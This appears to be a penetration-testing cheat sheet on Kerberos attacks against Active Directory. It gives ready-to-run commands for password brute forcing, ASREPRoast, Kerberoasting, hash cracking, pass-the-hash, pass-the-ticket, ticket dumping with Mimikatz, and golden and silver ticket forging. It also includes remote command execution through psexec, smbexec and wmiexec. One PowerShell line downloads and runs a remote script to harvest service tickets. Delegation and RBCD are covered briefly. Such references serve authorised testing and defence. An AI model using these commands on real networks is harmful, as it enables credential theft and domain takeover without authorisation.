# Kerberos

## Info

### How it works

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-ef1919da6e677e607dddcef9883b7043ce9a733f%2Fimagen%20\(10\).png?alt=media)

### Step 1

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-7853b37abf9c5a0cbc9482be1dfa8aeee1ecc103%2Fimagen%20\(11\).png?alt=media)

### Step 2

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-73878b6a92e81cb6be2ec5bbaad1bdf02c00a999%2Fimagen%20\(13\).png?alt=media)

### Step 3

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-ea70fd4f071f9c379736734c1d07df45a56dc7f9%2Fimagen%20\(18\).png?alt=media)

### Step 4

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-c0bc34d8947905a1d1cf30105a1b3afa65491ea0%2Fimagen%20\(15\).png?alt=media)

### Step 5

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-e2448ba6f96a41a09a5d7c728b76324a7c6af0c3%2Fimagen%20\(8\).png?alt=media)

## Bruteforcing

> Requirements: connection with DC/KDC.

### Linux (external)

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):

```
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

### Windows (internal)

With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:

```
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

## ASREPRoast

> Cracking users password, with KRB\_AS\_REQ when user has DONT\_REQ\_PREAUTH attribute, KDC respond with KRB\_AS\_REP user hash and then go for cracking.

```
# LDAP filter for non preauth krb users
LDAP: (&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))
```

### Linux (external)

With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetNPUsers.py:

```
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
```

### Windows (internal)

With [Rubeus](https://github.com/GhostPack/Rubeus):

```
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>

# Powerview
Get-DomainUser -PreauthNotRequired

# https://github.com/HarmJ0y/ASREPRoast
```

Cracking with dictionary of passwords:

```
hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file>

john --wordlist=<passwords_file> <AS_REP_responses_file>
```

## Kerberoasting

> Cracking users password from TGS, because TGS requires Service key which is derived from NTLM hash

```
# LDAP filter for users with linked services
LDAP: (&(samAccountType=805306368)(servicePrincipalName=*))
```

### Linux (external)

With [Impacket](https://github.com/SecureAuthCorp/impacket) example GetUserSPNs.py:

```
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
```

### Windows (internal)

With [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
```

With **Powershell**:

```
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
```

Cracking with dictionary of passwords:

```
hashcat -m 13100 --force <TGSs_file> <passwords_file>

john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
```

## Overpass The Hash/Pass The Key (PTK)

> NTDS.DIT, SAM files or lsass with mimi

### Linux (external)

By using [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```
# Request the TGT with hash
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
# Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
# Request the TGT with password
python getTGT.py <domain_name>/<user_name>:[password]
# If not provided, password is asked

# Set the TGT for impacket use
export KRB5CCNAME=<TGT_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

### Windows (internal)

With [Rubeus](https://github.com/GhostPack/Rubeus) and [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
# Ask and inject the ticket
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Pass The Ticket (PTT)

> MiTM, lsass with mimi

### Linux (external)

Check type and location of tickets:

```
grep default_ccache_name /etc/krb5.conf
```

If none return, default is FILE:/tmp/krb5cc\_%{uid}.

In case of file tickets, you can copy-paste (if you have permissions) for use them.

In case of being *KEYRING* tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```
# To dump current user tickets, if root, try to dump them all by injecting in other user processes
# to inject, copy tickey in a reachable folder by all users
cp tickey /tmp/tickey
/tmp/tickey -i
```

### Windows (internal)

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in Powershell:

```
.\Rubeus dump

# After dump with Rubeus tickets in base64, to write the in a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<bas64_ticket>"))
```

To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter):

```
# ccache (Linux), kirbi (Windows from mimi/Rubeus) 
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
```

### Using ticket in Linux

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```
# Set the ticket for impacket use
export KRB5CCNAME=<TGT_ccache_file_path>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

### Using ticket in Windows

Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Silver ticket

> Build a TGS with Service key

### Linux (external)

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```
# To generate the TGS with NTLM
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

# To generate the TGS with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

### Windows (internal)

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

# Inject TGS with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Golden ticket

> Build a TGT with NTLM hash and krbtgt key, valid until krbtgt password is changed or TGT expires

Tickets must be used right after created

### Linux (external)

With [Impacket](https://github.com/SecureAuthCorp/impacket) examples:

```
# To generate the TGT with NTLM
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# To generate the TGT with AES key
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>

# Set the ticket for impacket use
export KRB5CCNAME=<TGS_ccache_file>

# Execute remote commands with any of the following by using the TGT
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

### Windows (internal)

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

# Inject TGT with Mimikatz
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd in the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Misc

To get NTLM from password:

```
python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'
```

## Delegation

> Allows a service impersonate the user to interact with a second service, with the privileges and permissions of the user
>
> * If a user has delegation capabilities, all its services (and processes) have delegation capabilities.
> * KDC only worries about the user who is talking to, not the process.
> * Any process belonging to the same user can perform the same actions in Kerberos, regardless of whether it is a service or not.
> * Unable to delegate if NotDelegated (or ADS\_UF\_NOT\_DELEGATED) flag is set in the User-Account-Control attribute of the user account or user in Protected Users group.

### Unconstrained delegation

1. *User1* requests a TGS for *ServiceZ*, of *UserZ*.
2. The KDC checks if *UserZ* has the *TrustedForDelegation* flag set (Yes).
3. The KDC includes a TGT of *User1* inside the TGS for *ServiceZ*.
4. *ServiceZ* receives the TGS with the TGT of *User1* included and stores it for later use.

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-8cc14d9c8b88d6990e23fe70ea1148f47902acef%2Fimagen%20\(19\).png?alt=media)

### Contrained delegation and RBCD (Resource Based Constrained Delegation)

Delegation is constrained to only some whitelisted third-party services.

* S4U2Proxy Contrained

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-6dc5c2f4f05bbfeb78ce7253822eb28e09cab3c9%2Fimagen%20\(5\).png?alt=media)

* S4U2Proxy RBCD

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-6b4bb4bfa8fe6fba744a4a6d39a7203e681a2b17%2Fimagen%20\(4\).png?alt=media)

* S4U2Proxy Service Name Change

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-43096efb2178dab82ef8b4f7bbaa3fa55f535cff%2Fimagen%20\(17\).png?alt=media)

* S4U2Self

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-ead251806c4d1148374157f273f08a9aa1dc310c%2Fimagen%20\(3\).png?alt=media)

* S4U2Self & S4U2Proxy combined Contrained

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-7398ca3cb2e6b376ef39b28a4fa2f27e47d83acc%2Fimagen%20\(6\).png?alt=media)

* S4U2Self & S4U2Proxy combined RBCD

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-bd409b3b6dbaf286f33e579816fdb466882ecadc%2Fimagen%20\(9\).png?alt=media)

* RBCD attack

{% embed url="<https://github.com/tothi/rbcd-attack>" %}

![](https://2600312148-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FGV3RhNj8bI8UCnsKYdEg%2Fuploads%2Fgit-blob-cbc03a86bbb7b8402e567b88a796495137a35c9e%2Fimagen%20\(16\).png?alt=media)